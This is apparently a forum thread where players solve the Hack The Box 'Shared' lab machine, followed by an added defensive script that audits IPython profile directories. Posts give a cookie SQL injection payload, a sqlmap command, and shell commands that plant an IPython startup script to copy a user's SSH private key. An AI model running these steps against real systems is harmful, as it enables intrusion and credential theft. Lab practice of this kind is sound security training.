Posts: 9 Threads: 0 Joined: N/A
July 24, 2022 at 12:41 AM

(July 23, 2022, 10:08 PM) OldName2 Wrote: (July 23, 2022, 09:57 PM) Exa Wrote: (July 23, 2022, 08:11 PM) OldName2 Wrote:
If you put something in the cart and proceed to checkout, you'll be redirected to checkout.shared.htb with the cart contents within a cookie.
That might be injectable.
Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.
It has to be, but I'm not getting it to work. I've also tried SQLMAP:
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5

Uh, got it working: {"53G'+'G2EF8'UNION SELECT NULL,NULL,NULL-- -":"1"}
Bit confused on what the whole sqlmap payload was? Trying similar ones but it's not giving me a response.

Posts: 10 Threads: 0 Joined: N/A
July 24, 2022 at 12:46 AM

(July 24, 2022, 12:41 AM) vinciwashere Wrote: (July 23, 2022, 10:08 PM) OldName2 Wrote: (July 23, 2022, 09:57 PM) Exa Wrote: (July 23, 2022, 08:11 PM) OldName2 Wrote:
If you put something in the cart and proceed to checkout, you'll be redirected to checkout.shared.htb with the cart contents within a cookie.
That might be injectable.
Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.
It has to be, but I'm not getting it to work. I've also tried SQLMAP:
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5
Uh, got it working: {"53G'+'G2EF8'UNION SELECT NULL,NULL,NULL-- -":"1"}
Bit confused on what the whole sqlmap payload was? Trying similar ones but it's not giving me a response.

It won't work like this.... Try doing it manually. First go to order something, then change the cookie. When you are done, click Cont... to order and it will send you to the checkout subdomain and you will see it.

Posts: 166 Threads: 0 Joined: N/A

(July 24, 2022, 12:27 AM) blahblah Wrote: (July 23, 2022, 11:58 PM) yumi Wrote:
/bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython
Searching the web about ipython
Found that: https://security.snyk.io/vuln/SNYK-PYTHON-IPYTHON-2348630
ipython --version shows: 8.0.0
and this looks fine: https://github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x

Yes, I found it and I'm testing some scripts. The scripts are deleted, but so far I can't get a shell; maybe copying the ssh key to another location if it has

Posts: 19 Threads: 0 Joined: N/A

mkdir -m 777 /opt/scripts_review/profile_default
mkdir -m 777 /opt/scripts_review/profile_default/startup
echo "import os; os.system('cat ~/.ssh/id_rsa > ~/rsa')" > /opt/scripts_review/profile_default/startup/foo.py
and look in the '/home/dan_smith' folder

Posts: 10 Threads: 0 Joined: N/A

(July 24, 2022, 01:10 AM) Truss46 Wrote:
mkdir -m 777 /opt/scripts_review/profile_default
mkdir -m 777 /opt/scripts_review/profile_default/startup
echo "import os; os.system('cat ~/.ssh/id_rsa > ~/rsa')" > /opt/scripts_review/profile_default/startup/foo.py
and look in the '/home/dan_smith' folder

Woop! I did not know that I need to make a new dir! I was thinking it already has been created, but okay, thanks!

Posts: 27 Threads: 0 Joined: N/A

Looks like redis is the way to root. There is /usr/local/redis_connector_dev but can't figure out where the pass is in it.

Posts: 10 Threads: 0 Joined: N/A

(July 24, 2022, 02:17 AM) rubymurakami Wrote:
Looks like redis is the way to root. There is /usr/local/redis_connector_dev but can't figure out where the pass is in it.

There's some text if you use strings on it ..... but still could not find anything. Did you find something?

Posts: 27 Threads: 0 Joined: N/A

(July 24, 2022, 02:47 AM) blahblah Wrote: (July 24, 2022, 02:17 AM) rubymurakami Wrote:
Looks like redis is the way to root. There is /usr/local/redis_connector_dev but can't figure out where the pass is in it.
There's some text if you use strings on it ..... but still could not find anything. Did you find something?

Tried the exact same thing, nothing just yet, but I am sure it has to be this file since the output when running the command states logging in to redis.

Posts: 10 Threads: 0 Joined: N/A

(July 24, 2022, 02:52 AM) rubymurakami Wrote: (July 24, 2022, 02:47 AM) blahblah Wrote: (July 24, 2022, 02:17 AM) rubymurakami Wrote:
Looks like redis is the way to root. There is /usr/local/redis_connector_dev but can't figure out where the pass is in it.
There's some text if you use strings on it ..... but still could not find anything. Did you find something?
Tried the exact same thing, nothing just yet, but I am sure it has to be this file since the output when running the command states logging in to redis.

Using r2, then afl showed me this: sym.github.com_go_redis_redis._Conn_.Auth. Try it with me, since I don't know r2 that much.

Posts: 27 Threads: 0 Joined: N/A

(July 24, 2022, 02:54 AM) blahblah Wrote: (July 24, 2022, 02:52 AM) rubymurakami Wrote: (July 24, 2022, 02:47 AM) blahblah Wrote: (July 24, 2022, 02:17 AM) rubymurakami Wrote:
Looks like redis is the way to root. There is /usr/local/redis_connector_dev but can't figure out where the pass is in it.
There's some text if you use strings on it ..... but still could not find anything. Did you find something?
Tried the exact same thing, nothing just yet, but I am sure it has to be this file since the output when running the command states logging in to redis.
Using r2, then afl showed me this: sym.github.com_go_redis_redis._Conn_.Auth. Try it with me, since I don't know r2 that much.

I'm not a pro with it either, about to read up on it right now. I think we are heading in the right direction, to say the least.
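
Added example, not part of the thread and not code from any poster: a defender-side audit of a directory in which a scheduled job starts IPython, tied to the advisory linked above about IPython picking up a profile directory from the current working directory. The function name, the `run_as_uid` parameter and the finding labels are hypothetical, the sample layout is constructed, and flagging every `profile_*` directory rather than only `profile_default` is a generalisation.

```python
import os
import stat
import tempfile

STARTUP_SUFFIXES = (".py", ".ipy")  # file types IPython runs from <profile>/startup


def audit_ipython_cwd(cwd, run_as_uid):
    """Return (finding, path) tuples for a directory IPython is started in."""
    findings = []
    # Anyone who can write here can create a profile directory.
    if os.stat(cwd).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("cwd-writable-by-others", cwd))
    for entry in sorted(os.listdir(cwd)):
        profile = os.path.join(cwd, entry)
        if not entry.startswith("profile_") or not os.path.isdir(profile):
            continue
        findings.append(("profile-dir-in-cwd", profile))
        # A profile owned by someone other than the job's user was planted.
        if os.lstat(profile).st_uid != run_as_uid:
            findings.append(("profile-owned-by-other-uid", profile))
        startup = os.path.join(profile, "startup")
        if os.path.isdir(startup):
            for name in sorted(os.listdir(startup)):
                if name.endswith(STARTUP_SUFFIXES):
                    findings.append(("startup-script", os.path.join(startup, name)))
    return findings


def build_sample(root):
    """Constructed layout mirroring the thread; foo.py holds only a comment."""
    os.chmod(root, 0o777)
    startup = os.path.join(root, "profile_default", "startup")
    os.makedirs(startup)
    with open(os.path.join(startup, "foo.py"), "w") as fh:
        fh.write("# constructed placeholder\n")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding, path in audit_ipython_cwd(build_sample(tmp), os.getuid()):
            print(f"{finding:28} {path}")
```

Any finding on a directory used by a privileged job is worth acting on: update IPython as the linked advisory describes and start the job from a directory that only its own user can write to.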